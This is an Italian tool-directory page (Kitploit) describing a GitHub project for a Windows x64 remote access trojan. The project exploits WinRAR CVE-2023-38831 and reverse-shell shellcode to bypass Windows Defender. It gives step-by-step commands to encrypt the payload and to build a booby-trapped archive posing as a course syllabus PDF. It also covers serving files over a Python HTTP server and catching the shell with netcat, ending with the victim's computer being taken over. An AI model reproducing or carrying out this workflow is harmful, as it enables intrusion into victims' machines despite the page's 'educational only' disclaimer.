Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Windows-X64-RAT — Trojan di accesso remoto (RAT) per Windows x64 che utilizza una combinazione della vulnerabilità CVE-2023-38831 (vulnerabilità di WinRAR < 6.23) e della tecnica di sfruttamento Shellcode. | Kitploit
Strumenti/GitHubGitHub/maorbuskila/windows-x64-rat
Analisi delle VulnerabilitàExploitShellcodeCommand and ControlApprendimento e FormazioneSviluppo PayloadTrojan di Accesso RemotoBinary Exploitation
GitHubmaorbuskila/windows-x64-rat

Windows-X64-RAT

Trojan di accesso remoto (RAT) per Windows x64 che utilizza una combinazione della vulnerabilità CVE-2023-38831 (vulnerabilità di WinRAR < 6.23) e della tecnica di sfruttamento Shellcode.

Vedi Repository
22 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Trojan di Accesso Remoto Windows x64 (RAT)

Obiettivo

Sviluppare un RAT Windows x64 utilizzando CVE-2023-38831 (WinRAR < 6.23) e l'exploitation dello Shellcode per bypassare Windows Defender.

Descrizione del Sistema

  1. Inizializzazione dello Shellcode
    • Generare lo shellcode usando Windows/x64 - PIC Null-Free TCP Reverse Shell Shellcode.
  2. Spiegazione di main.cpp
    • Iniettare ed eseguire lo shellcode in memoria per stabilire una connessione TCP inversa.
  3. Compilare e Crittografare main.cpp
    • Compilare il file C++ in un eseguibile e crittografarlo.
  4. Exploit di WinRAR CVE-2023-38831
    • Usare la vulnerabilità per scaricare, decrittare ed eseguire il RAT crittografato.
  5. Decrittare ed Eseguire lo Script (decrypt_file.ps1)
    • Decrittare ed eseguire l'eseguibile scaricato.
  6. Esecuzione
    • Aprire il PDF/immagine creato per attivare la connessione reverse shell.

Guida all'Exploit

Avviso: Queste informazioni sono solo a scopo educativo. L'uso non autorizzato di queste tecniche è illegale e antietico.

Istruzioni Passo-Passo

  1. Creare lo Shellcode

    • Usare 51721.py per generare lo shellcode iniziale.
  2. Modificare e Compilare lo Shellcode

    • Apportare le modifiche necessarie allo shellcode.
    • Compilare il codice modificato.
  3. Crittografare l'Eseguibile

    • Usare decrypt_file.ps1 per crittografare l'eseguibile compilato:
      root@kitploit:~
      .\decrypt_file.ps1 -inputFile .\main.exe -outputFile .\enc_main.exe
      
  4. Creare un Archivio WinRAR

    • Usare cve-2023-38831-exp-gen.py per creare l'archivio:
      root@kitploit:~
      python cve-2023-38831-exp-gen.py NetworkSecuritySyllabus.pdf script.bat NetworkSecuritySyllabus.rar
      
  5. Configurare un Server Python per il Download dei File

    • Navigare nella directory contenente enc_main.exe e decrypt_file.ps1.
    • Avviare un server HTTP Python:
      root@kitploit:~
      python3 -m http.server 8000
      
  6. Prepararsi ad Ascoltare la Reverse TCP Shell

Disclaimer

Queste informazioni sono fornite solo a scopo educativo. L'uso di questo exploit senza esplicita autorizzazione è illegale e antietico. L'autore non si assume alcuna responsabilità per un uso improprio di queste informazioni.

Scarica lo strumento
  • Aprire Netcat per ascoltare le connessioni TCP in ingresso:
    root@kitploit:~
    nc -lnvp 4444
    
  • Attivare la Reverse TCP Shell

    • Quando la vittima apre il file PDF, la connessione TCP inversa verrà attivata, dandoti accesso al suo computer.